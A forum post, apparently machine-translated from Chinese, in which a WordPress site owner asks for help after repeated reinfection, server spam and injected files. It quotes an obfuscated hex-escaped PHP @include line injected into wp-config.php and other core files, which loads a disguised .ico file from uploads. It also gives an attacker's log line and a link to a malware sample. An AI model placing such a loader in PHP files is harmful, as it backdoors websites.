我在Azure Centos 7 LAMP Server上运行wordpress网站(最新版本,也更新了所有插件到最新版本)。最近,我注意到我的服务器发送了垃圾邮件。当我详细检查这个时,我发现在服务器上创建了一些恶意文件。还有一些帖子的标题为“被xxxxx黑客攻击”。
然后我停止了postfix服务器并通过sendgrid路由联系表单电子邮件。还使用一些防病毒插件扫描wordpress文件,删除可疑帖子并确认没有恶意文件。但是在一两天之后,又发生了同样的问题,向index.php,wp-config.php注入了一些恶意代码。
这是注入index.php,wp-config.php,wp-settings.php的代码:
/ 42be3 /
@include“\ x2fva \ x72 / w \ x77w / \ x68tm \ x6c / d \ x61fa \ x74er \ x2fbl \ x6fg / \ x77p- \ x63on \ x74en \ x74 / u \ x70lo \ x61ds \ x2ffa \ x76ic \ x6fn_ \ x6668 \ x39cd \ x2eic \ x6f“;
/ 42be3 /
还发现wp-config.php和index.php的权限从644更改为755
我当前的权限是:
文件夹:755
文件:644
以下是来自apache的日志:
184.168.193.119 - - [15 / Mar / 2017:17:46:33 +0000]“POST /wp-content/themes/Avada/bbpress/title.php HTTP / 1.0”301 -
如果我们删除日志中提到的文件,就不会有问题。但是在一两天后,他们将在任何其他文件夹中创建另一个随机名称的文件。
我已将恶意文件代码添加到我的Dropbox帐户。
这是链接:
https://www.dropbox.com/s/yql04vr6ltiy9oz/samplecode.txt?dl=0
我采取了哪些措施来阻止这种情况:
不幸的是,仍然有新的恶意文件在服务器上创建并生成电子邮件。
如果有人能帮助我,那就太好了。
提前致谢